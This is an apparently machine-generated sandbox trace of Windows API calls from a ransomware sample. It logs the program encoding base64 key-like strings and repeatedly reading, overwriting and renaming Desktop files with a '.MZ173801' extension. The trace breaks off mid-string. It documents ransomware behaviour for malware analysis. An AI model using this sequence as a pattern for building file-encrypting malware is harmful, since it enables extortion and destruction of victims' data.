0x1358 [0123.444] GetCurrentThreadId () returned 0x1358 [0123.444] GetCurrentThreadId () returned 0x1358 [0123.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.444] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.444] GetCurrentThreadId () returned 0x1358 [0123.444] GetCurrentThreadId () returned 0x1358 [0123.444] GetCurrentThreadId () returned 0x1358 [0123.444] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TZsHRoCh7.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\tzshroch7.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.444] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.445] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.445] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x110de [0123.445] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.445] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x110de, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x110de, lpOverlapped=0x0) returned 1 [0123.506] CloseHandle (hObject=0x410) returned 1 [0123.508] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TZsHRoCh7.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\tzshroch7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.509] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x110de, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x110de, lpOverlapped=0x0) returned 1 [0123.511] CloseHandle (hObject=0x410) returned 1 [0123.511] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\TZsHRoCh7.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\tzshroch7.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\TZsHRoCh7.xls.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\tzshroch7.xls.mz173801")) returned 1 [0123.512] GetCurrentThreadId () returned 0x1358 [0123.512] GetCurrentThreadId () returned 0x1358 [0123.512] GetCurrentThreadId () returned 0x1358 [0123.512] GetCurrentThreadId () returned 0x1358 [0123.512] GetCurrentThreadId () returned 0x1358 [0123.512] GetCurrentThreadId () returned 0x1358 [0123.512] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b6a960, ftCreationTime.dwHighDateTime=0x1d5e5f5, ftLastAccessTime.dwLowDateTime=0x470f9460, ftLastAccessTime.dwHighDateTime=0x1d5e2e1, ftLastWriteTime.dwLowDateTime=0x470f9460, ftLastWriteTime.dwHighDateTime=0x1d5e2e1, nFileSizeHigh=0x0, nFileSizeLow=0x1fa4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="V6GTXq9VntApgCCTZhE.mp4", cAlternateFileName="V6GTXQ~1.MP4")) returned 1 [0123.512] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.512] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\V6GTXq9VntApgCCTZhE.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\v6gtxq9vntapgcctzhe.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8b6a960, ftCreationTime.dwHighDateTime=0x1d5e5f5, ftLastAccessTime.dwLowDateTime=0x470f9460, ftLastAccessTime.dwHighDateTime=0x1d5e2e1, ftLastWriteTime.dwLowDateTime=0x470f9460, ftLastWriteTime.dwHighDateTime=0x1d5e2e1, nFileSizeHigh=0x0, nFileSizeLow=0x1fa4)) returned 1 [0123.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.513] GetCurrentThreadId () returned 0x1358 [0123.513] GetCurrentThreadId () returned 0x1358 [0123.513] GetCurrentThreadId () returned 0x1358 [0123.513] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.514] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.514] GetCurrentThreadId () returned 0x1358 [0123.514] GetCurrentThreadId () returned 0x1358 [0123.514] GetCurrentThreadId () returned 0x1358 [0123.514] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V6GTXq9VntApgCCTZhE.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\v6gtxq9vntapgcctzhe.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.514] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.514] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.514] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x1fa4 [0123.514] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.514] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x1fa4, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x1fa4, lpOverlapped=0x0) returned 1 [0123.515] CloseHandle (hObject=0x410) returned 1 [0123.515] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\V6GTXq9VntApgCCTZhE.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\v6gtxq9vntapgcctzhe.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.516] WriteFile (in: hFile=0x410, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x1fa4, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x1fa4, lpOverlapped=0x0) returned 1 [0123.517] CloseHandle (hObject=0x410) returned 1 [0123.517] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\V6GTXq9VntApgCCTZhE.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\v6gtxq9vntapgcctzhe.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\V6GTXq9VntApgCCTZhE.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\v6gtxq9vntapgcctzhe.mp4.mz173801")) returned 1 [0123.518] GetCurrentThreadId () returned 0x1358 [0123.518] GetCurrentThreadId () returned 0x1358 [0123.518] GetCurrentThreadId () returned 0x1358 [0123.518] GetCurrentThreadId () returned 0x1358 [0123.518] GetCurrentThreadId () returned 0x1358 [0123.518] GetCurrentThreadId () returned 0x1358 [0123.518] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebfad40, ftCreationTime.dwHighDateTime=0x1d5eaea, ftLastAccessTime.dwLowDateTime=0x280a6380, ftLastAccessTime.dwHighDateTime=0x1d5e0f0, ftLastWriteTime.dwLowDateTime=0x280a6380, ftLastWriteTime.dwHighDateTime=0x1d5e0f0, nFileSizeHigh=0x0, nFileSizeLow=0x17e35, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="v8 HU.mkv", cAlternateFileName="V8HU~1.MKV")) returned 1 [0123.518] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.518] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.518] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\v8 HU.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\v8 hu.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ebfad40, ftCreationTime.dwHighDateTime=0x1d5eaea, ftLastAccessTime.dwLowDateTime=0x280a6380, ftLastAccessTime.dwHighDateTime=0x1d5e0f0, ftLastWriteTime.dwLowDateTime=0x280a6380, ftLastWriteTime.dwHighDateTime=0x1d5e0f0, nFileSizeHigh=0x0, nFileSizeLow=0x17e35)) returned 1 [0123.518] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.518] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDY